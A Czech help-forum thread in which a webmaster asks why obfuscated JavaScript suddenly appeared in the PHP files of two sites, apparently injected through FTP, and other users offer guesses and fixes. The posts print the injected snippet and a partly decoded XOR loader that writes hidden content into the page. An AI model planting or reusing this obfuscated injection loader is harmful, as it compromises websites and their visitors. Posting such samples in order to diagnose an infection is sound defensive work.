» Poradna » Počítačové sítě

Vir? měnící webové stránky

 |   | 

Dobrý den,

dneska ráno mě nemile překvapila následující věc. Na dvou webech, které občas pomáhám udržovat, byly nepochopitelné chyby. Nevěděl jsem proč, ale následně jsem v HTML kódu (v PHP skriptech) obou z nich objevil následující kód:




Nechápu, jak se tam dostal. V zálohách jsem nic takového neměl, takže oprava byla rychlá, ale děsí mě, že nevím, čím se to stalo. Předpokládám, že chyba bude někde u mě, protože oba dva weby běží na hostingu jiné firmy, takže nepředpokládám, že by se někdo naboural přímo do serverů.

Spíše teda předpokládám, že mám v pc něco, co dokázalo ty skripty změnit prostřednictvím FTP. Nenapadá mě totiž ani nikdo jiný, kdo by kromě mě mohl mít FTP přístup k oběma serverům....

Zkoušel jsem se dívat různě po netu, jestli nenarazím na podobný problém. Našel jsem něco zde: www.webhostingtalk.com ... ale bohužel tam si nikdo nevěděl rady.

Tak se chci zeptat, jestli někdo netušíte, co to může způsobovat? Nebo jestli nevíte, kde bych našel nějaké informace?

Odpovědi na otázku

 |   | 

Koukám, že se mi tady ten kód nevložil, snad to teď dopadne lépe:

<!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28hzK
.... nepíšu sem celý kód, má přes 4kB ....
h%28JYi%29%7B%7D%7Dvar%20hzK%3D1%3C/script%3E"))</script><!--[/z0s]-->

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Neni to nejaka reklama hostingove firmy?

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Tak to nevím, ten skript negeneruje nic viditelného, žádnou reklamu, takže nepředpokládám.

Projel jsem ten kód a vypreparoval z něho toto:

<script>
if(hzK!=1){
function RC(Ef){
return Ef
}
try{
var WD='',Om=WD.substr(2,1);
var ve=Array(dm('187'),7639^7459,dm('228'),3092^3297,29669^29451, dm('247'),dm('243'),dm('185'),23196^23165,22421^22375,5280^5193,dm('232'), 2236^2075,dm('200'),32672^32607,13646^13793,23352^23539,28825^28751, 27546^27441,dm('202'),28885^28729,dm('174'),27683^27871,3948^3997,dm('230'), 15922^16109,14355^14579,16239^16287,16495^16597,dm('226'),dm('195'), 17002^17025,12038^12235,401^301,dm('169'),2458^2377,dm('234'),dm('172'), dm('191'),15898^16043,16248^16331,13830^14001,dm('227'),dm('165'),dm('192'), 12483^12311,19335^19325,dm('215'),18213^18309,dm('182'),dm('221'),6932^7121, 30473^30671,11947^11881,dm('168'),dm('239'),15585^15435,27460^27641, 29683^29525,20303^20471,11427^11391,dm('217'),23676^23681,7883^7797, dm('218'),dm('219'),19761^19919,5026^4935,24503^24323,18986^19103, 13127^13187,dm('141'),8024^8077,19423^19309,dm('176'),8318^8375, 5604^5385,dm('173')),Ho;
var xu,nW;
var yC='',Qx='';
WD=WD.split(Om);
for (Ho=0;Ho<yC.length;Ho+=2){
nW=yC.substr(Ho,2);
for(xu=0;xu<WD.length;xu++){
if(WD[xu]==nW) break;
}
Qx+=String.fromCharCode(ve[xu]^135);
}

function dm(OB){
return parseInt(OB)
}
document.write(Qx);
}
catch(MH){}
}
var hzK=1
</script>

akorát moc mi to teda neříká, co by to jako mělo dělat...

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Neco k tomu je tady: navody.c4.cz ...

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

jop dnes sa mi stalo presne to iste .. heslo na ftp som mal 39 znakove zlozene z vsetkych moznych znakov ale napriek tomu sa tam ten kod nejako dostal

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Mal som niečo podobné, obnovil som web zo zálohy ale u všetkých súborov som zmenil atribút len na čítanie a pomohlo to.

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Zdravím. Asi 3 dny se k tomu nemohu dostat, ale dnes už mne to přinutilo podívat se na ten virusek.. Mám to taky na svých stránkách a odhaduji, že se to tam dostalo přes formulář v diskusním foru. Krátkou dobu se tam někomu daří vkládat nesmyslné odkazy a jsem si jistý, že tímhle se to tam podařilo vpravit až na server do php souborů. Nic, jdu studovat internet, kdyžtak se ještě ozvu, co teda s tím.

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

docela super antivirak a zadara zkoušel jsem ho mužu jen doporučit www.sosej.cz ...

Souhlasím  |  Nesouhlasím  |  Odpovědět

Související témata: Následující věc




Určitě si přečtěte

Zbavujeme se Googlu: vybíráme nejlepší alternativy, které nahradí jeho služby

Zbavujeme se Googlu: vybíráme nejlepší alternativy, které nahradí jeho služby

** Google nabízí spoustu služeb, ale většina z nich má i dobré alternativy ** Pokud z nějakého důvodu nechcete používat služby Googlu, nemusíte ** Připravili jsme přehled služeb, kterými lze ty od Googlu nahradit

Karel Javůrek, David Polesný | 89

Užitečné funkce ve Windows 10, o kterých možná ani nevíte

Užitečné funkce ve Windows 10, o kterých možná ani nevíte

** Operační systém Windows 10 nabízí spoustu užitečných drobností ** O některých funkcích mnoho uživatelů není ** Ukážeme vám některé užitečné vychytávky

Vladislav Kluska | 81


Aktuální číslo časopisu Computer

Odhalte skryté funkce Windows 10

Test levných Androidů do 4 000 Kč

Srovnání úsporných minipočítačů

Změřili jsme rychlost 10Gb/s ethernetu